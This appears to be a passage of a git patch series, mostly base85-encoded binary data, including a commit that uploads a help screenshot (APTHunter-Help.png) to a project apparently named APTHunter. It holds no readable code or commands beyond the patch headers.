zrDbATTKJ%4-9mm@Sv1DW*S5HYFQ;Ck%kizK=u2j%U31FYLnkUKs;&WE9E0eyZ`%C9 z5!L+>5$lGxomZXj4z93HQ%3{a1*n;7C>U?Iv1ZaNw-SP4@FAm=bUP}rqf4_lZ;R9? z4G$w=MiNx7H>mu>H%>-v5V~INPlgCiS4Vsa47H~_kJrVCEMH2T3va9NDh4wEfZtqe zIYJYED3T4+rEx2-D7&!|O2S!b=fg>~9CXy2b{`Vtu)nBrdTL}bzmgY_RC%moxhqse zm$1IBv$}R8*IV?hFu<1b4mmWvXfwQ_Y%eO8dnBO++U_ltwp?H$5v1#bYp0r|MQ?=* zdWP5u0wiI*TLQ-?8pDk3d>;6Af?s*#I1R=u#K1W@=~izTu0C#G4VO8+I$r7?f&pvY zuC2LJ=+@}rHnvh`0tUB@p;DJovfA#EmnDJH&ef%Xr<(*#RYtOoc>~nhR*Ju(ZPJ}F z(aCatg^=jJW~F?b=y6$d82SjE>GaB48`6|-#p+X`MwVZ-7qmZegtf_{%VR~A-lk%4 zzBQhSNh9$~6UNx*&Usw{JA768es~jYlFU84aRh^qtGrZ*Dydp}T>&&`9mG~U*73bT zB{4eA>34tFttQb_-?xFJ653Db zxP6T}RO7k04!QkO6Nm3{W3B>@?aRJt5lhc;@7ET<^viFmIiey~tvcm>_Kj^ce$)1i zst!kfYtA7GNfWmG=QkWCWquDDs^sPNlTuUVyuF(i8d3Tq4)WcxN@HCi<+PQv0+%z36bE>hDq<4DE%KJgnSjmq9%5E4zoZBKzV!sAOn*TT(HErLZLl`aJd-{^ zm0%cu^>~>td-N&2BJdl)s2{8YK$W8T1Y;A zhkAe!Oq@g@qf4Y8A;dw}N~2_)pYCAy_|psAPG-?yp}*3sIG*8=las5G{x*b_G(T#y zQ=fUEEsfx_*9TR3JR=q>SoaAap_O_|gc0>1pJy>?{|YUnUaIu~2Pa^eE$5v<=fA2j z>+Ubd&vr=vZue()Rxs~9?vizMJQ(Hrbb=QdSz-m93IC{q$dnS~lVU literal 0 HcmV?d00001 -- 2.34.1 From 830c1a6159bf480fa16b91eafe54cbe1ee42f097 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:45:01 +0800 Subject: [PATCH 11/13] ADD file via upload --- source/screenshot/APTHunter-Help.png | Bin 0 -> 88327 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/screenshot/APTHunter-Help.png 
diff --git a/source/screenshot/APTHunter-Help.png b/source/screenshot/APTHunter-Help.png new file mode 100644 index 0000000000000000000000000000000000000000..c5a495b7d3c4edb49eb9067c12a1f1b6664ea6a9 GIT binary patch literal 88327 zcmdqJcUV(f_bzHf-5^+y4&qjdbm_edNbfB)kq!bvC{jYihEkT!`sr`=9Ha_ ztFsLk*vj3;#szHe>alUQN$S+8o2QiT$?82xULE&KFvUO?4ti<^a_R<4R7uQgP43HG zWO{L`^GqM{=|^gpINypSjqG1znP8F-Z!g=8x}w=yvHgj>hsEd1OY7;NM-rOPgr7bi zd7~`EqCtK3Rp`~5SA;8N6cqh#dFN(xJL^_#%mSd4_km%Qp!CHFPCE|f;cHshNq zZY9Qaso3Ykl%AtmL|k2ZO%VFFdt70X**)KBpD!XFGE~XyfKMxb^dao=sWQM1-N!|D zZ;eX}XVAG;V7B1%f;wWD&!*|Po>-4|425S;%*V`}Hz_ov<7ueCchnIXK|7+(R#$3r zOIw6g9Jy~Qi)fxW(ghX%=)yAHj(z}hQA^I{rZMcnv!O9-hhcdJU*|fmB7UtsouyAt z>e~bqI(+Y^%?O^q>a->HC@FjXOw^0*>jZ1kS%6i9NMg9kJ-%5Q;+A;Of%Bzg*Il}u zI#H$UtWEiS8T>BPZM^DHg*W;ao`lKH!fMGz?-bNLWtx&8B8+ffz1~)~=Yax$t0`&P z!38V(0ujgd#xB&BU|@3l|Kd-hP^j_a%EgFfr;%|RPv;IN`>c}7Ji!l^_BB+;S0uP< z22oL%z^%BP?~+v#(%n|Do1Qq!-LllhU{I*mQexhJP-_|RCm|VsC`d;Ud zWeBq%)mx_IJi;hXQJGD)fh$E&v-FRurHUL2jOI@Siy(eEt7BTFvB|uo89{;(4i_Qe z9+z?p)K|)uez$;TEdR1Sd=rsAJhXXUX`x;QNi48Qq}z6Q@3ANYb&*x5gIcEzNK#wbu@pp|3hCcwD6!l}Csh4*_H=A~lZd?1 z8)Yr#49mq#4>vm-(s=BV>TzC@0~y0rqvc{}J$Yg^LWhN01#;*3N>cNg1P!@DyUpkP zm7J&>glOLmn94*wPCWyxTBcUbsp11@wZJtp=j`RWElp@2nSi%v`eU%UNvfB==z&5Q zS&CZ=s5PM#VVXNg9-BR1_;PB5RdTYA_7yzLLG^D~x#^kfiF}sY9Bdm}Lo2l%(cG)! zHV_3#%$svMBN{zk7RQ^*%N6f{xyM{k<7oM0SGmU<@oLJ+3jJFE-e<_mtHU~B#y<|1 z*L5zVV}^SbO&HDB2l~IK#MKV_fZU7nm{-ouajDMuJ@N^Vv{EC7a64%$bi!kIr6c>k zrypYynh{dfQO#fw#$Tx<%D0jAwL<1KcL(+r4ck~98LeRXV8KHsA&855no0YBXv(s`lJmceco!QU6^C@IoU=51 z*^b-1#7W^TF1FcHyt{s}@|&$Di8#aBleths=3%~8fvfYuv&xSS$6$bsfneW>ZH9%| zfo;j(aB(23(TVbX5m0A!okSaFiRq8SmEf1 zuokFyj&emuNp=oTYx;sj`D3`+#TV^ozt_J?mB0w?{4-24M)D*GVNx3Q>Nk{oD>fu! 
zVc`tzwBe}TYJTRMwl+`^A*PEvZ4c*Kj`Ndm*!@hlwwEj2Dxf`Aeu1QRt+PM3PE24- z#_NaIc)_5ygYW`ojKAjJv3ClSe*h!uE)1sJ`HF4|WF-sCp7Fo%<5c(Ow0cv%fI)ly zFstCqTG;4x=yKH&42Q>FR$Gh;T$XQ5`{INjRNzW;?D7`JblskpY9HA(tk0|IQAXZy z;5OL?xi#k98|~R+QU1q-$5yXFOp}av;!AK4e13__!a-YTgrbE>R5sx+QwL0cOn(a2 z^Bze!YA07ONYJ9<*Egq_$dgWTA>jwvW5z%xdLUaZZJ=e5+x)zgYq?5^1SIm=&5;I` zptT*~Z0dcaZ7g}!`OUr95GhS$s3}HyDEXF(vKgIQw+$xVv&Fl$(sr#T?V}wiZN(B) zYA`_F#;dJrm8SmL6mcFx;DxZZrKNQodI@S2!VU^3LEztnhF?I5fB-x)Q-B;TurDWE z&EN3S43WA~xLH{AU5CNymSw>r5y;<9p}EtTK??mL<5ssqTG3s0Lr9ch-fJD5VZ~&y zC$u(OHD1Jb0nR5jRo#@DpAc76fcfO67M)$#^U8`F^jzvJFgtQa(Wh*phYB&zqFQ%j zxz}mb**GPzHeQ9bb%lpWI$-dUmU5J1dOqD$)G4rblAYh_V_mRNE z^N?7J_T^0)&DKwiJ-Ks^?vifwsOxMi6@3XIK$ZZekcCgUYE_#BtI(*nM6^Cvhsyv+$yz!M^btiABUbx|f zX@(b`+ZjQas+X{aTfvz0Awu-vKH41`U>5t*MefJ+Aog%jInOr2U;UAC+yN%^je&?`!3wzz*G026UsP(V((Ju7AQ)P^OeqizrhB^nv$d31shUD!X2IsU`8HvDLD1o0ZT| znY+A^#E%ZP*=rYRmwKh^*wtpvVzPkEXSK5~rDb;4xcVl$G)!c^Jl+okvCEHCa;Fs? z!1-oA{P)P?=|`SX)_G9yezY%;(YDfCDW6E#5A=1(zKz4K{!D%x?^SjRIj-7KLan8#r`9=`>pLxy`{&LG{a@~49{Un*O+>r@EbqugNojYa@LYzNL9F22 z2M#-;O6Ep03AURIq)qlKnJetD?Xs*E^H6Z2K~G}Tz=DAa*b86t?(O?B<3lRxvs{9x z40VXgqBB(=n<{Ws&V->6`zq~|sE067E}j_3!_7Wh25ZUQvxZ+7@V=XVbH`@Nkr z<=5v#<2WN(NaFd+wN?3}H@NJluD2;;s1L_B6Hvvta+m$?_d~_b8#%&iNxHh~f)=?Y zyxn^VVZ6mX+9&J>;89XaISku29miOQlJ|JNFo$i8w3%2!A^Y89h$#HGo$&jC%s-f7 zt(}TxU;n4>&{yj{OCPAM7Qr5p5+&FL7LOU{Ds$Xmy`lpG^I~A~H2O8xWQ6f`%SyLP9tho_vjkrdH7)5rRWZ(cSS5PF;wa zyMXalz}S*Mym#-VY2*Um8m^&W&mx!Cd147%?+zUJo4c8HAKZScAn98Lf*fklUt50C z(QquIdTz-(mPC(6H502``36IH(HpY#c84TyvzY;<_?#*3BCg?ubPXYWz zz2H~hnlQAmcoL6Y4?t;I{kaExtGI@Pe=cYJ))?p8kGx7Pnl_$~Bbf6hhciti%mk<% z{j-W@$U`%F`Y^rb>kgQd48{((wr$X~{Lb7!l15Xb4j=tw)n6!#xl!wrChm9}TGV`s zR2v5s;Hif^wa7Cj<#q?4BV|nvyI1ARJ{K6mBvOZaqw^+MlID4LM9XjNmcs8yNA+!1 z-Ju&*1Y+&Ax+vikqUJvWg%jZ*{;Yn02%aN2iTR&S+AR)jY`lEK2@L?uu8jlAjDdDH z7pmpwtX(}uw_M5NWe<&=$@aYjNyQ~RQZSS<(%Ps<@!i#KOOTEMpvG!|*P^xfU49#N zmC!Zu)-oxj&xCpns1^?CW8=CAvF-dHU^6h_M0rXZY@m-wZyUmq0!RDl_QS?grz-ER z;XaiyFF^w6O@2zPY|~#`GmF)%iaZ8k~6&R 
zd*xQ(A7*@7kT3h>K5I?2`E$Bq2QGQ3KA*-|Sy|V>TqEk8`e0<$JdG!`FB1!oDPCAU z$wUue6(<6oTHMCvm`($HBXqzZXZy&iRVfQzGUC|o0xA_50!W&9PszQL9FHzD2FyFT zWIEjbX4pF6zum7FBhUDirH?Xl*0A}6# z$E>-7GnZ?`?#??*rNc|a8PxYGYjfv8f7X=(Z~h|FbJcYTwyN#PEc&{`jyl7yegN+YNGWfbu8rC+ zeRSej_8IH@>Y?$F9IWu?uZ03&FnC*G+s}$t2lJI0nA4ejJkR-6TyR$0YNrI31^Ji6 zb!t=sA;-hA?aDG~tV&;@HeblA%nKC2Y7L@mg-)pWj|`IR{u@QVgd8l(o)1>hJ62v! z$WJinVI##)B)rm-6atDRnNbnR@o@|BuLF3xw>9nD>NsF=yMq#t)qK8FY3(c*ELvXfT|ZNoY`|k#?laM&Abv0 zT0XpIOd@AkH<8>82~Vuaw(d5J=~~p(X#-H(UJ&P(rNQg}2;eJEp9DXykRfiPCzXyJ zY?h2m4zLJu`R>v8Apd(O>nc|CKo!=H4slZc|S{|7yj zLX8U$VJx{1B`Qa}V-SzRi?}Y=v45IvUl8bVfC-a08W%a3(=B}77~JMN3G5ubiDch{uudycxl(AQZ+!M_oMIYy_N8Dr?+>p%{40;dz^F8s{WYQs znVkd+oLWwlF@Rtb$iBZ)3lF+>u{L;KVs)`B{;g@)eaF)LdxL4&;Xn>R_I}w26U*K@ znHSCSU(yQBr1NJ?-x{iG%sjfU*fNSXQzrTMX_e^5zd25mX+k*M#f}UZgassq5zK;y zdYQ{VVu>Yj_qTalX%|aG^2zR**GZ#3{C&`xB`2WJ_y_De&zu7 zFY$jM7k^2Qkq>vz91G`mJkYah94)ZB!Mi8x`S6f_Fk!=MIZ^2mvTor;sc~H2_THQT z<$-DitY{64R*be4b`Gm_E2)AwZ~6%i{eXpvxEPO_<5Wc`Tov9#i7(n_fi%)8KtZ>c zAW|!Ptx2*k_G-Qd{5XYTfLMC&04G!P2(y7za@H5?k+$_0I7CM=6-p@yzB*930gz+Z zFng2X=~MQk>tKMJUa@O+{!3qeIy4RYtL(_8|GNbFZ|V=Bc1tw4Oxu>63Ck`e{h|N; zu>H?rpK#PGQv;~6u)m$D(@-kbA+gwQTTRsBM5B03`oEKkp11Pm<+J=Fjy3hZQ23P6 zJg2}UKgM*M#9hUxbs&7v_WcLJ#3w=$h@~I-?0=GSerS~cZm{8}npGLd^TrOiwdZ?l z8A<&F1Il&XV{1c?2(nS!rmi|08##=D+3G zGX1-PaFvma1|)AGm`7u#+zC;L3tm6dmXR}^&y3~M>>NJlo-6)C7r!A8E~+31C?-D` z=1Bs{lq>!6n@Y0_8?r+!J7g&X5cNa#VLK71^YE5jh4u%P{Ww-Wu^R(^cm7AcCY1oV z|8BQazezP~{LDXkSn-{{LOO#7hgVL#Jbn8k@(de2Sl~#{;KH7f`yqs@_A^T1c}A;n zt(cTHHX;9nd-saWUmpYt@EQOmD)hf zZ%wG_WM>j|^`ZwV38miO^%6`j1dMFV%C-TUI{SRpw=9Pl_b7^P_`f+(`rNLK3zD#C z|J}Y4JpM@t(%rh)3YC9jIY3i^!d;y|{_nom`2k&4!0EMOfYS?BPGkx>7i*>RGo=2_ zx&hT$x3Q1(pJ_1^bm21z>Ko%2_CdEx~wigDXO zSEoH;u}YJuhN^s%by5sEUJNl=1pcoE_sw<~40x;OllRn$Ez@cB8~|seD8;ogGivw8 zxI+Z$4qOW}zuIK<=6~Ec+eIi=-m3kObiV&4B(N?HikuLwe~)-C5p3)hY4+H|7mzmn&b0I z4P`DSFURVdZvdh9tvsvfi}fcn$RglZ57P z+g>sl0Dl}5cQu~h?G;c)>W2ux0r7DtO{iO8)bAoN@VEL~FeE01~EPysd!=2BbHq+5811|SX?@4m?YAvn?&<;4>GeJLDn;~hU($p+5| 
ztLko`FZS8K0e}RSHT#L=@J9p=VaFZyb3d<7*#=$@7o`ngFM96BDSF&UIX=CV*{n4~ zXU3404^bO9NtAyB!{8C?ab^*)q`Z+%$&yC?fiJg3!{}l47jlt)dS3(~K!NGDswqBy zt6<^eG~J7Ip}Ze;M)mV}IN8zNq6Tp}uJE z>|YgE0SUDY#s!&C6z=pQd?JWzXk+FvrX;9C)O5}LB93U1;u(>RN`Se7vVDGd+>$$V=}%zvr?7iKb47KR(;`HA$ziTbtBPqOJu9+p zo7Q)0U=->^^UvfD^ap|qZBebs{l7@;!(Mq5p}pXy`@f}-zIweDO229{C(p@7Jb z{x=0=fbT>aD)}vU2N$M-?ip0DS(Q_m9Xyb2=1eXTOJ)qQCn~*q+l&?My_+vZY`BROQt)AGoFtSl$jSap4j6(P-TH_AdcNR>qa8)xiL(8dNdm)>RHhVE1_Mn3=-O$f zaHrehg2NwUOmkDIc392T65*&HDD^se*O^kJ@$kagSo7{h2;5o!UeE7dy8X0K0tP)za2TDG+AR;J?5?iF6Di5o z1>2wbovVl4clQZ@Wl=Tg}S3Z7v3$ z;cDD)eBxBcZcp})aq`{68ow1jmQ{dsW)*N~{PYn3ZRispAr1hg7cl6i3%bJi+u^bW zRsLpFQJ;#*e~xnz{8tx@4SPRQ1nA!lnUb6Z(|DTqraj?xZv5$@jH;t?s~?XL;7Hqj zL(2XUjM+6ORc;5o$XT1#pV3Tt^XWI z{R_qVW5IgqfoB+soN3>jpKdN2uL)zxNBnCe{+H2fLXeKnUv2w|NdWbyNO#QIHK{hyy8sG7&!Qy78JkZ!;fD}fdY zpy&OH($~tRR&=Ie&{o|^n+&o>ntQqx4pyKVp@)1Mo~n+e>}W5-Mubhd@c;{dYfqqZ zJ{C`-|5Fpq(|x#o!uJ1zsj!4gT1zHn#V!yXzZs^!u}46=c72pBVKYvy`=vt`-v}Do z$wmG0H?8z{-Sqz#_fNCSIKm22(xdW5ajHh(BRU;?vC zhzZztWsia4NUNqs#{m)fTqBMDo5N?GxJrBdo7MI!n-!uB2g0Q+>}v(A21e3^Fe0cJ zH(w@eF;Kk_J2c9h@YQ#>y8y%UGn?(21RmkDbj8W4>OL$NlSr7oAL|pJjO4C)mq~+9 z82qkij($YT+B=PJNY7!QX*d)&W`N%pl)O!61p8{GY>+?EKOnCv-L*0@p7F6^Hych5 zj}_$6^6nnmoV2anNI6e-{j^hQo}dLsft{)W{8-8GWimXcNoSxoUA{*W{k3RP_s_W% z0yBO4m5}e*<{7FyAH_4TxeFWyaU5pGbrDye~CQ z?b~ijMHxxI+2n7t30t*qGEcj%08pX*5)P zBoH5y5bQt{fd>&E6h zGk_y1G2ZU9QaXO6uz^Eu{)NubqW;fR-C2`FheG&des`wea({Y`oue9#a zkrmBxXPS-RymC}YMpMZms%h3?eI}gDH_Fz)W6+hV^08%ps8fOehoMb!A7`H-gSpUW zR&@ay?ZtPN(D-l4lPkR;5#n2pU-YBT!5IOM$~+`69+~b(79=j1frG}P>Pbn=XYx|T zi7EkTC7gS-@5#;f?}K%>^bWYHt0G!OqZt;T6`irMyT8qS+1fR^wWuKlP=f-=q^An~ z)zEki<<1L`hKjXStCvdj4cLSt@;NQA3)f1&1yA9VjdpJ}Bk&mvHv%&;45qEC%CAf- zN389MdmOO_AAaSDuf&HXhwo?DLaWl7HC6o@Q&8fgTyxw!PJ=wx5xHLr;sYLVAOQYe zmmX14fmm=A+Zj4tuo7I(ZLIB@uUo9ukj7!Z#+se7=e^iA+C8q8$Zn_}Ugvu}!7b{Q zALz&8@jd&wfX3hq0jveBAIvOB}mFexh)k=K-8@c4MW#cZgr?N*e~OvK|~Y zG`_&LZysbGFcwL*{M*|ihmO@*;hCDrN}+UV-btO8d0yvX_D|fMy!#l66eUn0hR`HzKJdLH{MFpz 
zR@$Y3*!Xa3_S&6YnIK%Is;d-qS!i^toJR^cB!)3iv7(3YJey%6T1d94>(NXBtH@;3 z{Dh8{3+>33FlD7nuE&0}25E!TK^=E@(u)5X)t6JzjDos_yW0E}-DwS1RC3N%b&SV7 z(_&{t2sXmkzeK*9CxQvK3`OoevN=xz+WRbX8}A)7;ob>?df&nB+zyx=nxb00?BeZ_ zC$LxhY~Gai3;J*>dce(8S|^_-?T+Ib4_0hclj@e&!KUWCL{Wdz8&FJuBj7B7h|ie zce>-2hDX893Mtav%iq37r#g2n5*?)G@(dDvn#DnPF(B{Uf$Ir(Y)BrEMscQE6Lcv4h)CiORS3+ky%RQ7K>7 zvpu_{1XjQ}u7b*`Xb;j4S<2?mb#&@{x6k*f#<~Z&qqmZ8ZxE|a(WJbyJp>&dL~+;O z(ptDwz-Qauu1r3%+!o$>_zr$&iFHWX3OZO|m@0uESPI>UHR&w8dZ|z zDo%V}W3kXgvf+5T-4G8XjBz*!DJ@($ylXrb|1`{TXuKrqotT$ns1nqe)`wMEDRvG}AUXf2VXuw> zExI)|Y=={mWi-*%UYNAi-?*W;>1&SPIf%x)rX66+!doRY!Evw9_06JtXG)_y9J`1N ziOQ=rW~>rfuHFD6=A^y9;0|Au?w3Td;N&%e+IpaM5yb3Kv6ttJqAYAm*=^dFiDM7G zB*4m(aybv8#)@-3zMu6-N$#nb|3oT)oz`l@N#%K4h*Z9t6@%Szf-z#Ph7SKwGHcjo zHD)-TBtHD=N@0zc4SF?^Frgu{JVcOl9uuEr;z~a78BZ?6tj7gdLt}BQp>hzu2s~sf zQzn?ju;Ej?GprIdw-{!acc5e4HvD<-y65*Z4mVv_5`&iOTx8cff_+)&8@A(0+%{U^ zR2J0~IBSJ%Tf0gt58s>=tAW8GD54U_PekfvQwfePiQ<_%l=GqErxo>Z@2b-rp*>QQ zH8e3^8+*vHxH)K9^o}*4jlub#CD}Iso-Nq4x>$psE=0GrXtE|{xI*=L56 z7HqyPdBzUowLoKGw~y=d6dF09Gy#EkZwuz05QNufPJ9RPSN(iD?htAzmsYDv92`gNN56KwP38>Q zz0J5l{uO;}W=Mti(>#>bxRCo@We?RRdQ@BTd006}X!tjNQ5s%p)D?03@{Rb8XaA;j79keD}HO+Hp-UKrqu(JV1SG~{vjL%K~Y-3`D zm&|LRTdRLbrUK6l9C=JMX#Uv&l>AgR?&jg-atjwnJ>pcASVxU{~2WLF|lf z0`51L1)NQ#19OfiS9?cESUg4`%nVp$z2dTer#k&GAquY$IiLiP483N-_L`G0M>Po@EtN*bT}Zod*DmB#6QM2E8>Lk^X(A@<#sPRY;v}= zRRgZ4T_p%)H@~lL6J*f)8Qn4!+++eP#F~ajipB?wa|no1U5MPZ5fYBt{cUEhhOhmp zt~M(Zciv{tO!h3b`9aKZgPC#WlwVTI^h)oClS2q1$*HI}-URVn?W4JVKWih%!0v(5 zj*@Z1ftF(1^5Ld`y3mkgL=DH2;2o_l2L2vM>(wK48lZawD6N!%l%ZoV^J*B@~WR4XhrR&j7!R zcc;ZjAB78Q4Pl_BLvJqB?sS|lnu`^sI=8$`JhvC*c&zCf-o>XGkK;+DEZvFiF=AhJ zN38VKS2fral#x@b{Qfc-J%ewZq^3-KK*Df^#Zo_b(qk?S`u<>5CS;wx$ou2qkn~EgDl`i9 z=jd?9BxfPi01~vke@}ZD2dB_a?Od9}g3JQdDfDKaJq4yNnvermS^U#wzF5jnV zj634cgcSKB6X@87DcCuUeetehnCa-=V$*sCS^FpF{+hYetQAi<5wuzXS0yx*KDi}7@nNnS*Oc0&v6Arxsgon z1|cm&*L1ZZ9iND-@rXHuXI4r2gd$+t?^VN4&6{gq(KrnE+9syC?jjlEWq}Q8A6UhG zv>&2%MkJ7O(m2w5wYMmuhCQgi*_#WwuPEE;LX21t_kwHyZ+8M$@^eB~dn-1DEmf?F 
zM;uu-jxCt#GqKG$P0VG4LwfZ8jLFujkT&W4mX{+r*}asq7Uv!xU%5<04ANa4P?Z)r zI9Dl%8lE=cAO?_O-gT6nf~k%_hRlEe+-`Cj&tkBXa|1S>fmZaUaY{z*yeeyO-g$a& z%wdC>`>NL2J+;N@_M)LNsAPtdOWdobl;Kgo>{L2c(81szHcb-+$RsZ13|pWfWx!jc z4qYuQmI0XiQomma`>|qP)dsvm+bf-&u@6IQYz zx6s7KdCr*dqm-;JBoSn~B4grsjf}zH5cK||;ZV8$!|D?+(0)82ZfU(kf$CW!Go9sWQYQQ^UKSTCYmekn3i4J4GjcitlzDV-_@MjL@3i~to&Ae`8F?J| zO89g%16oiAyH=bS=pL7IJ4?q_KmAelzz8#g#6xAO3mqdmY**7pPgLWzmXk&1kn_~h zVvF;L;_nB&%1$&ijG0X83xu#Xx$^7^axk*{^}Ju-ueKZOjVzAT@-bl_*guD9#tY{` z@TJ+!((uLOc(XM>sjLS0XyL$j$0t}h3x58p-A7V0x4r#Mf`mswZqMN^tXb1cm={)Y zEW|pR-gi_z&Gn3Q98?uI9u;gWMn9(XJKQ%^U8d<+dg&_8I*HU4R#jqL8MvGpr4q!2 zJhq*Aqn#r?}a#bdNwC0;Gzp;k<62@VG zq$7&DzS?PzYABrmI2PVBmHR-&n4`)D(*e8(Cv`(Ro$W=S#=HZ$w~z4(PTqKgYU{Ai zqSh0m5%rPRBZwo> zua9_;ng!wU-!D9V5TC`%)0>==L5zJAmUb}t+H?JLP)}R6KoxHm*JY383wv`O{>H`} z(lp82^Z_}X#%39Oj0cKkSZm3K_%t^<*50wsvoFON7+m|?HfOoF5!2vQUpw`U-Jw-L zu~9LuA@yol^tg0n${mx2%5+{QQWg*H7v8`Y-b=7bK=WQ~KGnHlB zc1PD4F4q8h0@Wz`z|-)vR$r6fhwq->B^Au-WoW;Q`pyGvz~nAAPZeZe<2!SqsyyV3 zjiwTp5v{a`BCa4HZo__9`aS5-H5kO7jM^>fUmaBi-7$2Pa2`JHQ#n}{_(z?}AraFz zQDS3OBR23Q%}&5=sG>VATmoId$iVIJIj^&JS~p{?SI06fYp=>W8zf9ptYyG5FqX#d zI8v`w#Tk1UEp}85yy^g5ufSU2-wqEkD{x_BpK)`JiXA>r-fgt*B;jJft!Okzm=AP_ zhk%A}$9jqS?(MlBexGN7v}!$A*<7ijwD8_~*x?C9M^M=Behyp}4V2owFfkG|5i=}} zw@AD^N%1%}P5%iCoC?fbf?J9jIxf~jPdP4ngVB&Duo1#?PT3J&K7Ydd*W){Et%Cpe zy>R}2{9?S{UIjqxe*9m66StiDZ!gjx`J<=mMPk-qr#M(#T@%9Q&~_{)m=L^ z2)ub}A4B0d#Hs>e#STtXBLnv zk3S+cltn6C6vVcca|2Jr>>RVbs-b|a@{rV)VF#KZCepYP?uKJ?aYv22hhrk-ehJf) z+KRl6&I9{(!Yaz9L5fI+wXsgs+I5c9qo$SKh{ly;XDx%O zAzw9D8qmnf&-4A7MTXeGQTE=FVHY|mS;-#zEs4zg)lbiK+_aLrDSwquFG|HxgI!+T z?yKEKLjZJutx%_+utH<7Kv%yV>vJPDhzYxTyk0p}H-z3EwyLi*nZq~h2@ft0FnQ-X z1|)U};}ab{K^I$UEIdj&VbVQ1$Kj{ibeZVr$^4~Njx+jS5?`<6W;t79bShnd1m74` z=`=Na>}GxxHYlyE535O2cgHcGo}&K7#)lLt(R?{_{6byvc_rIt&uYJ~@?ksy0=%>@h5=Bc~z zF`8VCQ>KDa3>gb$+hChjopj1t(=BFKwIUAXt^?}X&mU}pI(eeU984S&sO%n!o_%p< z-k(Vx87nnM@l6OVaCGZqsv*}I8LsZfbCSm4DBofJWVe4VT+XG zwKz+*!#gM`iSKsG6Wi^w-W&%)t^wQ{W+YGN8K9F$BK{T$Z@(Aarv}c%cQ(cTiG9vz 
z?pyAC_MKC-DP{?^;j4n@26{H&i^WfEELJQr!Kju$ycB(w8RfDCeMZmQ7z^S2U`wv| zeCF53To;|`sCq&-XQf{~u9TIy%QmXW7FNjs3*BIyh?I^OpE+0=7!~o{9)BUpe>1Xo ze_L?I$H+B`$_M*`FJikf%5t4vo$1W_)etNAi?7)Gue)cTPOA0Q-kGB>zcWfq)OCFS z6@}q`Oi%A3cSvai88(1ABd6iR!O{ITGPj8B4ULKiRju!uH>wuVGg^491bM8Vp-X)U z8(K((*)y+pUM>k@s1U)-BN>c_6UI(c?a`Mw7eorfi!|h|Pk$;8oX~s8{HsFP^-8 zvky%WY$eub4QoNl*h9VwS5H<_;3e8_m4}6i zyHnRU{G|mXugoDEh|MVPLMmI=){pn(-0ePDT~H-Y%2_(nPiBBW^cYKPI z3vF4m3rLNNY2Fu{7P;f&+X@rFP~3?kC638u=Wi8JdDI^>^BNGSW`@0T}V6d>$ZwjAk8BGa&r4P9KF_o)E zT*EnSdtKGNyK7>QyQwZ@u14KDHT?T5q{cI8Kq0YbI>I`!8l6`RB3HKeP;^^ea5MMm z;`56!aG<}+`1%sOs6iAE}P%1hv1 zUSuHOtWT^IYpH|Au*99J9+}@fzUt*FIJTj~&$e(TG=Zw-wC$%OzAq_k*luML{*_k( z9PsZ23Fi}igXEmB>&UWs$e*eB&rB&Cvq{@Y^Do=oWE(}T-??i!*cKD_x_C|OLW0GoN-8RBHj`whMdY9NKDFOIcAR$&{S`0W{b_s-S&yL z5@y8Qay^?;!1uUWi8dnp`WP(lNjB1kqgv}?Fp88^VbX>zIa@77bV zqb$O<+Zac!J#iT7Hhzl4ftT$yG5#yONK|`kSqVthOejDcxl=<6N9Ha~-Kk5Zd;DBh zqVuz~3P0-@o(}(#Isyv*@Z=$1faMTb8%(@`gI9#guDr|I%BWkxvY!za>c#?rE1Pf) z9_0;e#aP4xtmGX>T52@=z4;qLMBPLE-Q?f&}Eqr?!b(ZCn!G|uAGaqg4I;lUc{QPaa^7+W= zZ6P9r^z=6`xz6=Vox%sJrF0Hv#L^^p!eB9La=KOMEIx*LjH}rDbHE{&M>;$3LFpD` zNWP7(9y>mhS2g3t(WPZghHD$9VLde`$3<*CGjb0&Ylq~e88UWHho})3zkf9($KnJl z*S|qwW@(O1l^^;ezqZw8Eb)UL zJ8nsk%VIn4VKl?F1O9)iA6AK6h)`3LxXpiOL7VOtk7BHa-5GTZYm}*npn&w1xsvnw z@A+B^d076Kq{yopDo#$(mx}F}Mhc%-<3uQo+Js@vt&l~SdDMLWX!)YE<#MAd%JW*Wih90!Lqlr4^UV8}UFaX+ zk@)`NQ7XG_-Qb!u75*lUt`O-?vpaVscDopR^sIHLY!`IYhN6WvSyRr0m(YtG*vHgT zzIJst_H??&n)ofOkxo^YY_#d^H+3Q-nD+ z<3er?`VAr*CWS>0@4w)xq?8@Anxi_u+hBKNCWL58h186)%?q9UrGaO8zgw2%fO3ro zqxnH&NFI~JW;<{$Uy`!6-|9f{^mqi*lbPX~qM<*Lw-_e^M&)vpkl3@~0X)s&3t$Fc zv+GXAK=RppjgvasZNKK91ets@opM2rSRd_ksq6w&B1V}%O1 zSh%6ekCi|M#!a{*5uo>T!7_V|X%%%2y~M-?Bngs8!kG(H< zy6oipaokhnK$}I1O~w^R%pP z3tWIo^BP8lKD_ZRS?L|pax1g_nLC8_0Nou6o;_nRP1i!QQ#Kh*(_D-czpVdEXTQ{9A~P zi)-YMy>knDUvRx_YRkYhSsQIhU33k5%*h~=$Re@%Q1+`;i@e#fv=@VU9kU`Tz0FR3 z!A1m6Yk#$TT?b)XwdAE0p$fNRz_7bC|HJkmVq#pqz8ak)h2;2R!7P_@MEYB3g zPSRr4y4row1Udy?Vnr339X#Zr6AKf=W)==)0WNvng66Wx8;K1 
zq}9Yjg%utwH+|BY-=A~*xxVlnBi#SP-dnK6(X3mbA%u{iA$YI^5_A~cHAsM9!QBQA z?(XhBxI4iHcbDMq!QEX4xs$!mXXosF?;p7R@W4RNbW>GtRjqfeRn<#NEe-=d4{paD z&p-(AE0a2|kd>cwq|6T*{*ud=>@{nXRcWqZl*DJ@`dcDNziHtyCma!b<>IibjKiag~LxPC7|i zPGNGIq1~dJrnDD{I2A?(MD%^9wDTskikho(<^iI~vFACi)`gBp=0C^+wGs^$8#7mr zC=n^XlPcuBhW|XDXI!~ef!^jtw{ToT$0>3m@9(G~eU$Bp)T=mMmp#=4$e-HR{O2=Yf1TKt|Z8~augKOWXIVTI%|ky+>(j&B6a}> z)g{E%lcVn}OZjXwzAt52sAb(dT6~`HUeVjXp7?w@M!)Y+>^qwO+}(&yIJTwNoUJ+2 zd8>oXg9p66kGaF_c^Kto%vt!NyYBGB2eiTdj@8BeU3Q6BW^T{7$6j3qP3KS7h^U2k6Y+h_3$}y@PnDcbd#%ZnGv93abtn?Ps^E6w 